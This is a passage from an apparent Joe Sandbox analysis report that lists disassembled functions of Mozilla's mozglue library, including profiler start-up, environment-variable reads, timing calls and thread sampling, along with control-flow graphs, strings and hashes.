                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9635A0: GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C96369F
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9635A0: __aulldiv.LIBCMT ref: 6C9636E4
                                                                                                                                                                                                                                                                                        • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C96309F
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C985B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C9856EE,?,00000001), ref: 6C985B85
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C985B50: EnterCriticalSection.KERNEL32(6C9EF688,?,?,?,6C9856EE,?,00000001), ref: 6C985B90
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C985B50: LeaveCriticalSection.KERNEL32(6C9EF688,?,?,?,6C9856EE,?,00000001), ref: 6C985BD8
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C985B50: GetTickCount64.KERNEL32 ref: 6C985BE4
                                                                                                                                                                                                                                                                                        • ?InitializeUptime@mozilla@@YAXXZ.MOZGLUE ref: 6C9630BE
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9630F0: QueryUnbiasedInterruptTime.KERNEL32 ref: 6C963127
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9630F0: __aulldiv.LIBCMT ref: 6C963140
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C99AB2A: __onexit.LIBCMT ref: 6C99AB30
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Time$CriticalQuerySection$InitializePerformanceStamp@mozilla@@__aulldiv$AdjustmentCountCount64CounterEnterFrequencyInterruptLeaveNow@SpinStartup@SystemTickUnbiasedUptime@mozilla@@V12@___onexit_strnicmpgetenv
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 4291168024-0
                                                                                                                                                                                                                                                                                        • Opcode ID: f720f1c3aa7183bd8ed24110f7c816a6ce4d709f5a57fb767e5ca9250014601a
                                                                                                                                                                                                                                                                                        • Instruction ID: b2bdbc77596f9693897eda8bc21137a85c06c6467ddc4d83fcbced6ec53e0a56
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f720f1c3aa7183bd8ed24110f7c816a6ce4d709f5a57fb767e5ca9250014601a
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F3F0D612E2974CD7DB50DF34A8411AA7370AFBF618B20171BE84453551FB20A2D88382

                                                                                                                                                                                                                                                                                        Non-executed Functions

                                                                                                                                                                                                                                                                                        Function 6C975440 Relevance: 138.8, APIs: 54, Strings: 25, Instructions: 587threadtimeCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                        control_flow_graph 514 6c975440-6c975475 515 6c975477-6c97548b call 6c99ab89 514->515 516 6c9754e3-6c9754ea 514->516 515->516 524 6c97548d-6c9754e0 getenv * 3 call 6c99ab3f 515->524 517 6c9754f0-6c9754f7 516->517 518 6c97563e-6c975658 GetCurrentThreadId _getpid call 6c9a94d0 516->518 521 6c975504-6c97550b 517->521 522 6c9754f9-6c9754ff GetCurrentThreadId 517->522 527 6c975660-6c97566b 518->527 526 6c975511-6c975521 getenv 521->526 521->527 522->521 524->516 529 6c975527-6c97553d 526->529 530 6c975675-6c97567c call 6c9acf50 exit 526->530 531 6c975670 call 6c99cbe8 527->531 533 6c97553f call 6c975d40 529->533 538 6c975682-6c97568d 530->538 531->530 536 6c975544-6c975546 533->536 536->538 540 6c97554c-6c9755f1 GetCurrentThreadId AcquireSRWLockExclusive moz_xmalloc ?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ call 6c975e60 getenv 536->540 541 6c975692 call 6c99cbe8 538->541 544 6c975697-6c97569c 540->544 545 6c9755f7-6c975613 ReleaseSRWLockExclusive 540->545 541->544 546 6c9756cf-6c9756d2 544->546 547 6c97569e-6c9756a0 544->547 548 6c975615-6c97561c free 545->548 549 6c97561f-6c975625 545->549 551 6c9756d4-6c9756d7 546->551 552 6c9756d9-6c9756dd 546->552 547->545 550 6c9756a6-6c9756a9 547->550 548->549 553 6c9756ad-6c9756b6 free 549->553 554 6c97562b-6c97563d call 6c99b320 549->554 550->552 555 6c9756ab 550->555 551->552 556 6c9756e3-6c9756f3 getenv 551->556 552->545 552->556 553->554 555->556 556->545 558 6c9756f9-6c975705 call 6c9a9420 556->558 562 6c975707-6c975721 GetCurrentThreadId _getpid call 6c9a94d0 558->562 563 6c975724-6c97573c getenv 558->563 562->563 564 6c97573e-6c975743 563->564 565 6c975749-6c975759 getenv 563->565 564->565 568 6c975888-6c9758a3 _errno strtol 564->568 569 6c975766-6c975784 getenv 565->569 570 6c97575b-6c975760 565->570 574 6c9758a4-6c9758af 568->574 572 6c975786-6c97578b 569->572 573 6c975791-6c9757a1 getenv 569->573 570->569 571 6c9758ea-6c97593b call 6c964290 call 6c97b410 call 6c9ca310 call 6c985e30 570->571 638 6c975cf8-6c975cfe 571->638 658 6c975941-6c97594f 571->658 572->573 576 6c9759c4-6c9759d8 strlen 572->576 577 6c9757a3-6c9757a8 573->577 578 6c9757ae-6c9757c3 getenv 573->578 574->574 579 6c9758b1-6c9758bc strlen 574->579 583 6c975cce-6c975cd9 576->583 584 6c9759de-6c975a00 call 6c9ca310 576->584 577->578 585 6c975a7f-6c975aa0 _errno strtol _errno 577->585 586 6c9757c5-6c9757d5 getenv 578->586 587 6c975808-6c97583b call 6c9ad210 call 6c9acc00 call 6c9a9420 578->587 580 6c9758c2-6c9758c5 579->580 581 6c975be8-6c975bf1 _errno 579->581 591 6c975bcd-6c975bdf 580->591 592 6c9758cb-6c9758ce 580->592 588 6c975bf7-6c975bf9 581->588 589 6c975d23-6c975d29 581->589 593 6c975cde call 6c99cbe8 583->593 627 6c975a06-6c975a1a 584->627 628 6c975d00-6c975d01 584->628 594 6c975aa6-6c975ab2 call 6c9a9420 585->594 595 6c975d1b-6c975d21 585->595 598 6c9757d7-6c9757dc 586->598 599 6c9757e2-6c9757fb call 6c9ad320 586->599 660 6c97583d-6c975858 GetCurrentThreadId _getpid call 6c9a94d0 587->660 661 6c97585b-6c975862 587->661 588->589 600 6c975bff-6c975c1d 588->600 612 6c975d06-6c975d0b call 6c9a94d0 589->612 610 6c975be5 591->610 611 6c975c7d-6c975c8f 591->611 602 6c9758d4-6c9758dc 592->602 603 6c975d2b-6c975d38 call 6c9a94d0 592->603 604 6c975ce3-6c975cee 593->604 594->586 631 6c975ab8-6c975ad6 GetCurrentThreadId _getpid call 6c9a94d0 594->631 595->612 598->599 608 6c975adb-6c975af5 call 6c9ad210 598->608 623 6c975800-6c975803 599->623 614 6c975c25-6c975c3c call 6c9a9420 600->614 615 6c975c1f-6c975c22 600->615 616 6c9758e2-6c9758e5 602->616 617 6c975c68-6c975c70 602->617 641 6c975d0e-6c975d15 call 6c9acf50 exit 603->641 625 6c975cf3 call 6c99cbe8 604->625 645 6c975af7-6c975afe free 608->645 646 6c975b01-6c975b25 call 6c9a9420 608->646 610->581 621 6c975cb2-6c975cc4 611->621 622 6c975c91-6c975c94 611->622 612->641 614->565 650 6c975c42-6c975c63 GetCurrentThreadId _getpid call 6c9a94d0 614->650 615->614 616->581 632 6c975c72-6c975c78 617->632 633 6c975c99-6c975ca1 617->633 621->603 636 6c975cc6-6c975cc9 621->636 622->581 623->545 625->638 627->628 640 6c975a20-6c975a2e 627->640 628->612 631->586 632->581 633->603 647 6c975ca7-6c975cad 633->647 636->581 638->612 640->628 649 6c975a34-6c975a40 call 6c9a9420 640->649 641->595 645->646 667 6c975b27-6c975b42 GetCurrentThreadId _getpid call 6c9a94d0 646->667 668 6c975b45-6c975b70 _getpid 646->668 647->581 649->573 664 6c975a46-6c975a7a GetCurrentThreadId _getpid call 6c9a94d0 649->664 650->565 658->638 666 6c975955 658->666 660->661 670 6c975864-6c97586b free 661->670 671 6c97586e-6c975874 661->671 664->573 673 6c975957-6c97595d 666->673 674 6c975962-6c97596e call 6c9a9420 666->674 667->668 676 6c975b72-6c975b74 668->676 677 6c975b7a-6c975b96 ?FiltersExcludePid@detail@profiler@mozilla@@YA_NV?$Span@QBD$0PPPPPPPP@@3@VBaseProfilerProcessId@baseprofiler@3@@Z 668->677 670->671 671->586 679 6c97587a-6c975883 free 671->679 673->674 674->569 686 6c975974-6c975979 674->686 676->583 676->677 677->599 683 6c975b9c-6c975ba8 call 6c9a9420 677->683 679->586 683->545 689 6c975bae-6c975bc8 GetCurrentThreadId _getpid call 6c9a94d0 683->689 686->604 688 6c97597f-6c9759bf GetCurrentThreadId _getpid call 6c9a94d0 686->688 688->569 689->623
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING), ref: 6C975492
                                                                                                                                                                                                                                                                                        • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C9754A8
                                                                                                                                                                                                                                                                                        • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C9754BE
                                                                                                                                                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 6C9754DB
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C99AB3F: EnterCriticalSection.KERNEL32(6C9EE370,?,?,6C963527,6C9EF6CC,?,?,?,?,?,?,?,?,6C963284), ref: 6C99AB49
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C99AB3F: LeaveCriticalSection.KERNEL32(6C9EE370,?,6C963527,6C9EF6CC,?,?,?,?,?,?,?,?,6C963284,?,?,6C9856F6), ref: 6C99AB7C
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C99CBE8: GetCurrentProcess.KERNEL32(?,6C9631A7), ref: 6C99CBF1
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C99CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C9631A7), ref: 6C99CBFA
                                                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C9754F9
                                                                                                                                                                                                                                                                                        • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_HELP), ref: 6C975516
                                                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C97556A
                                                                                                                                                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(6C9EF4B8), ref: 6C975577
                                                                                                                                                                                                                                                                                        • moz_xmalloc.MOZGLUE(00000070), ref: 6C975585
                                                                                                                                                                                                                                                                                        • ?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(00000000,00000001), ref: 6C975590
                                                                                                                                                                                                                                                                                        • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP,?,00000001), ref: 6C9755E6
                                                                                                                                                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(6C9EF4B8), ref: 6C975606
                                                                                                                                                                                                                                                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C975616
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C99AB89: EnterCriticalSection.KERNEL32(6C9EE370,?,?,?,6C9634DE,6C9EF6CC,?,?,?,?,?,?,?,6C963284), ref: 6C99AB94
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C99AB89: LeaveCriticalSection.KERNEL32(6C9EE370,?,6C9634DE,6C9EF6CC,?,?,?,?,?,?,?,6C963284,?,?,6C9856F6), ref: 6C99ABD1
                                                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C97563E
                                                                                                                                                                                                                                                                                        • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C975646
                                                                                                                                                                                                                                                                                        • exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000), ref: 6C97567C
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(?), ref: 6C9756AE
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C985E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C985EDB
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C985E90: memset.VCRUNTIME140(6C9C7765,000000E5,55CCCCCC), ref: 6C985F27
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C985E90: LeaveCriticalSection.KERNEL32(?), ref: 6C985FB2
                                                                                                                                                                                                                                                                                        • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_NO_BASE), ref: 6C9756E8
                                                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C975707
                                                                                                                                                                                                                                                                                        • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00000001), ref: 6C97570F
                                                                                                                                                                                                                                                                                        • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_ENTRIES), ref: 6C975729
                                                                                                                                                                                                                                                                                        • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_DURATION), ref: 6C97574E
                                                                                                                                                                                                                                                                                        • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_INTERVAL), ref: 6C97576B
                                                                                                                                                                                                                                                                                        • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_FEATURES_BITFIELD), ref: 6C975796
                                                                                                                                                                                                                                                                                        • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_FEATURES), ref: 6C9757B3
                                                                                                                                                                                                                                                                                        • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_FILTERS), ref: 6C9757CA
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        • [I %d/%d] -> This process is excluded and won't be profiled, xrefs: 6C975BBE
                                                                                                                                                                                                                                                                                        • - MOZ_PROFILER_STARTUP_INTERVAL not a valid float: %s, xrefs: 6C975D01
                                                                                                                                                                                                                                                                                        • MOZ_PROFILER_STARTUP_DURATION, xrefs: 6C975749
                                                                                                                                                                                                                                                                                        • - MOZ_PROFILER_STARTUP_ENTRIES not a valid integer: %s, xrefs: 6C975D24
                                                                                                                                                                                                                                                                                        • [I %d/%d] - MOZ_PROFILER_STARTUP_FILTERS = %s, xrefs: 6C975B38
                                                                                                                                                                                                                                                                                        • MOZ_BASE_PROFILER_LOGGING, xrefs: 6C9754B9
                                                                                                                                                                                                                                                                                        • - MOZ_PROFILER_STARTUP_ENTRIES unit must be one of the following: KB, KiB, MB, MiB, GB, GiB, xrefs: 6C975D2B
                                                                                                                                                                                                                                                                                        • [I %d/%d] - MOZ_PROFILER_STARTUP is set, xrefs: 6C975717
                                                                                                                                                                                                                                                                                        • MOZ_PROFILER_STARTUP_INTERVAL, xrefs: 6C975766
                                                                                                                                                                                                                                                                                        • - MOZ_PROFILER_STARTUP_FEATURES_BITFIELD not a valid integer: %s, xrefs: 6C975D1C
                                                                                                                                                                                                                                                                                        • - MOZ_PROFILER_STARTUP_DURATION not a valid float: %s, xrefs: 6C975CF9
                                                                                                                                                                                                                                                                                        • [I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES = %d, xrefs: 6C97584E
                                                                                                                                                                                                                                                                                        • MOZ_PROFILER_STARTUP_FILTERS, xrefs: 6C9757C5
                                                                                                                                                                                                                                                                                        • [I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES_BITFIELD = %d, xrefs: 6C975AC9
                                                                                                                                                                                                                                                                                        • [I %d/%d] profiler_init, xrefs: 6C97564E
                                                                                                                                                                                                                                                                                        • GeckoMain, xrefs: 6C975554, 6C9755D5
                                                                                                                                                                                                                                                                                        • MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6C9754A3
                                                                                                                                                                                                                                                                                        • MOZ_PROFILER_STARTUP_NO_BASE, xrefs: 6C9756E3
                                                                                                                                                                                                                                                                                        • MOZ_PROFILER_STARTUP_FEATURES_BITFIELD, xrefs: 6C975791
                                                                                                                                                                                                                                                                                        • MOZ_BASE_PROFILER_HELP, xrefs: 6C975511
                                                                                                                                                                                                                                                                                        • MOZ_PROFILER_STARTUP_ENTRIES, xrefs: 6C975724
                                                                                                                                                                                                                                                                                        • MOZ_PROFILER_STARTUP_FEATURES, xrefs: 6C9757AE
                                                                                                                                                                                                                                                                                        • MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6C97548D
                                                                                                                                                                                                                                                                                        • MOZ_PROFILER_STARTUP, xrefs: 6C9755E1
                                                                                                                                                                                                                                                                                        • [I %d/%d] - MOZ_PROFILER_STARTUP_ENTRIES = %u, xrefs: 6C975C56
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: getenv$CriticalSection$Current$Thread$EnterLeaveProcess$ExclusiveLock_getpidfree$AcquireCreation@Init_thread_footerReleaseStamp@mozilla@@TerminateTimeV12@exitmemsetmoz_xmalloc
                                                                                                                                                                                                                                                                                        • String ID: - MOZ_PROFILER_STARTUP_DURATION not a valid float: %s$- MOZ_PROFILER_STARTUP_ENTRIES not a valid integer: %s$- MOZ_PROFILER_STARTUP_ENTRIES unit must be one of the following: KB, KiB, MB, MiB, GB, GiB$- MOZ_PROFILER_STARTUP_FEATURES_BITFIELD not a valid integer: %s$- MOZ_PROFILER_STARTUP_INTERVAL not a valid float: %s$GeckoMain$MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_HELP$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING$MOZ_PROFILER_STARTUP$MOZ_PROFILER_STARTUP_DURATION$MOZ_PROFILER_STARTUP_ENTRIES$MOZ_PROFILER_STARTUP_FEATURES$MOZ_PROFILER_STARTUP_FEATURES_BITFIELD$MOZ_PROFILER_STARTUP_FILTERS$MOZ_PROFILER_STARTUP_INTERVAL$MOZ_PROFILER_STARTUP_NO_BASE$[I %d/%d] -> This process is excluded and won't be profiled$[I %d/%d] - MOZ_PROFILER_STARTUP is set$[I %d/%d] - MOZ_PROFILER_STARTUP_ENTRIES = %u$[I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES = %d$[I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES_BITFIELD = %d$[I %d/%d] - MOZ_PROFILER_STARTUP_FILTERS = %s$[I %d/%d] profiler_init
                                                                                                                                                                                                                                                                                        • API String ID: 3686969729-1266492768
                                                                                                                                                                                                                                                                                        • Opcode ID: 6fb74a32d0dbd02dc79fe6bcec550e93f8d84fc893e805cd8b46b9ab8c877291
                                                                                                                                                                                                                                                                                        • Instruction ID: 8477e72cc3cbe838dc11b2afec74290933f29c0f2f9f7f6a239dac51665badca
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6fb74a32d0dbd02dc79fe6bcec550e93f8d84fc893e805cd8b46b9ab8c877291
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 43221771A093409FEB919F74C44476A7BF4FFAA30CF14492AE84A97B41EB35C445CB62
                                                                                                                                                                                                                                                                                        Function 6C9AB820 Relevance: 102.6, APIs: 56, Strings: 2, Instructions: 1128threadtimeCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                        control_flow_graph 1061 6c9ab820-6c9ab86a call 6c99c0e0 GetCurrentThreadId AcquireSRWLockExclusive 1064 6c9ab86c-6c9ab870 1061->1064 1065 6c9ab875-6c9ab8b8 ReleaseSRWLockExclusive call 6c9ba150 1061->1065 1064->1065 1068 6c9ab8ba 1065->1068 1069 6c9ab8bd-6c9aba36 InitializeConditionVariable call 6c9b7480 call 6c9a7090 ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z GetCurrentThreadId AcquireSRWLockExclusive ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z 1065->1069 1068->1069 1074 6c9abaec-6c9abafb 1069->1074 1075 6c9aba3c-6c9aba72 ReleaseSRWLockExclusive call 6c9b7cd0 call 6c99f960 1069->1075 1076 6c9abb03-6c9abb0d 1074->1076 1085 6c9abaa2-6c9abab6 1075->1085 1086 6c9aba74-6c9aba9b 1075->1086 1076->1075 1078 6c9abb13-6c9abb59 call 6c9a7090 call 6c9ba500 ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z 1076->1078 1093 6c9abb5f-6c9abb6b 1078->1093 1094 6c9ac053-6c9ac081 ReleaseSRWLockExclusive 1078->1094 1087 6c9ac9bf-6c9ac9cc call 6c9b2140 free 1085->1087 1088 6c9ababc-6c9abad0 1085->1088 1086->1085 1091 6c9ac9d4-6c9ac9e1 call 6c9b2140 free 1087->1091 1090 6c9abad6-6c9abaeb call 6c99b320 1088->1090 1088->1091 1112 6c9ac9e9-6c9ac9f9 call 6c99cbe8 1091->1112 1093->1094 1098 6c9abb71-6c9abb78 1093->1098 1100 6c9ac199-6c9ac1aa 1094->1100 1101 6c9ac087-6c9ac182 call 6c999e90 ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z ??GTimeStampValue@mozilla@@QBE_KABV01@@Z * 2 1094->1101 1098->1094 1106 6c9abb7e-6c9abc29 ??GTimeStampValue@mozilla@@QBE_KABV01@@Z * 2 1098->1106 1104 6c9ac3ce-6c9ac3e5 ?TicksFromMilliseconds@BaseTimeDurationPlatformUtils@mozilla@@SA_JN@Z 1100->1104 1105 6c9ac1b0-6c9ac1c4 1100->1105 1113 6c9ac1f4-6c9ac274 call 6c9aca20 ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z 1101->1113 1114 6c9ac184-6c9ac18d 1101->1114 1115 6c9ac3f1-6c9ac408 ?TicksFromMilliseconds@BaseTimeDurationPlatformUtils@mozilla@@SA_JN@Z 1104->1115 1116 6c9ac1d0-6c9ac1f0 ?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z 1105->1116 1110 6c9abc2f-6c9abc35 1106->1110 1111 6c9abde0-6c9abdf7 ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z 1106->1111 1119 6c9abc39-6c9abc7a call 6c9a4ef0 1110->1119 1117 6c9abdf9-6c9abe06 1111->1117 1118 6c9abe0c-6c9abe21 ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z 1111->1118 1128 6c9ac9fe-6c9aca13 call 6c99cbe8 1112->1128 1138 6c9ac27a-6c9ac392 call 6c999e90 ??GTimeStampValue@mozilla@@QBE_KABV01@@Z * 2 GetCurrentThreadId AcquireSRWLockExclusive ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z 1113->1138 1139 6c9ac39d-6c9ac3ae 1113->1139 1114->1116 1122 6c9ac18f-6c9ac197 1114->1122 1123 6c9ac414-6c9ac41d 1115->1123 1116->1113 1117->1118 1117->1123 1125 6c9abe28-6c9ac050 ??GTimeStampValue@mozilla@@QBE_KABV01@@Z * 8 call 6c9a5190 1118->1125 1126 6c9abe23 call 6c9bab90 1118->1126 1133 6c9abc7c-6c9abc85 1119->1133 1134 6c9abcad-6c9abce1 call 6c9a4ef0 1119->1134 1122->1113 1129 6c9ac421-6c9ac433 1123->1129 1125->1094 1126->1125 1136 6c9ac439-6c9ac442 1129->1136 1137 6c9ac435 1129->1137 1142 6c9abc91-6c9abca5 ?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z 1133->1142 1143 6c9abc87-6c9abc8f 1133->1143 1154 6c9abce5-6c9abcfe 1134->1154 1146 6c9ac444-6c9ac451 1136->1146 1147 6c9ac485-6c9ac4c1 ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z call 6c9a7090 1136->1147 1137->1136 1138->1076 1156 6c9ac398 1138->1156 1139->1115 1141 6c9ac3b0-6c9ac3c2 1139->1141 1141->1104 1142->1134 1143->1134 1146->1147 1150 6c9ac453-6c9ac47f call 6c9a6cf0 1146->1150 1157 6c9ac4c3 1147->1157 1158 6c9ac4c7-6c9ac4fd call 6c9a4ef0 1147->1158 1150->1147 1164 6c9ac80b-6c9ac80d 1150->1164 1154->1154 1159 6c9abd00-6c9abd0d 1154->1159 1156->1075 1157->1158 1171 6c9ac50f-6c9ac5c5 ??GTimeStampValue@mozilla@@QBE_KABV01@@Z * 2 1158->1171 1172 6c9ac4ff-6c9ac50c call 6c985e30 free 1158->1172 1162 6c9abd38-6c9abda2 call 6c9a4ef0 * 2 1159->1162 1163 6c9abd0f-6c9abd13 1159->1163 1187 6c9abdcf-6c9abdda 1162->1187 1188 6c9abda4-6c9abdcc call 6c9a4ef0 1162->1188 1168 6c9abd17-6c9abd32 1163->1168 1165 6c9ac80f-6c9ac813 1164->1165 1166 6c9ac827-6c9ac832 1164->1166 1165->1166 1170 6c9ac815-6c9ac824 call 6c985e30 free 1165->1170 1166->1129 1173 6c9ac838 1166->1173 1168->1168 1174 6c9abd34 1168->1174 1170->1166 1179 6c9ac5f8-6c9ac62d call 6c9a4ef0 1171->1179 1180 6c9ac5c7-6c9ac5d0 1171->1180 1172->1171 1173->1118 1174->1162 1191 6c9ac67b-6c9ac6a7 call 6c9a7090 1179->1191 1192 6c9ac62f-6c9ac650 memset SuspendThread 1179->1192 1184 6c9ac5dc-6c9ac5f0 ?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z 1180->1184 1185 6c9ac5d2-6c9ac5da 1180->1185 1184->1179 1185->1179 1187->1111 1187->1119 1188->1187 1199 6c9ac6ad-6c9ac6eb ?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ call 6c99fa80 1191->1199 1200 6c9ac7a6-6c9ac7b2 call 6c9a9420 1191->1200 1192->1191 1193 6c9ac652-6c9ac66e GetThreadContext 1192->1193 1196 6c9ac882-6c9ac8bf 1193->1196 1197 6c9ac674-6c9ac675 ResumeThread 1193->1197 1196->1128 1201 6c9ac8c5-6c9ac925 memset 1196->1201 1197->1191 1213 6c9ac6ed-6c9ac700 1199->1213 1214 6c9ac706-6c9ac711 1199->1214 1211 6c9ac7e7-6c9ac807 call 6c9a8ac0 call 6c9a7090 1200->1211 1212 6c9ac7b4-6c9ac7da GetCurrentThreadId _getpid 1200->1212 1204 6c9ac986-6c9ac9b8 call 6c9be5c0 call 6c9be3d0 1201->1204 1205 6c9ac927-6c9ac94e call 6c9be3d0 1201->1205 1204->1087 1205->1197 1216 6c9ac954-6c9ac981 call 6c9a4ef0 1205->1216 1211->1164 1218 6c9ac7df-6c9ac7e4 call 6c9a94d0 1212->1218 1213->1214 1220 6c9ac728-6c9ac72e 1214->1220 1221 6c9ac713-6c9ac722 ReleaseSRWLockExclusive 1214->1221 1216->1197 1218->1211 1220->1112 1222 6c9ac734-6c9ac740 1220->1222 1221->1220 1228 6c9ac83d-6c9ac850 call 6c9a9420 1222->1228 1229 6c9ac746-6c9ac7a4 ?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ call 6c9ba610 1222->1229 1228->1211 1239 6c9ac852-6c9ac87d GetCurrentThreadId _getpid 1228->1239 1229->1211 1239->1218
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C9AB845
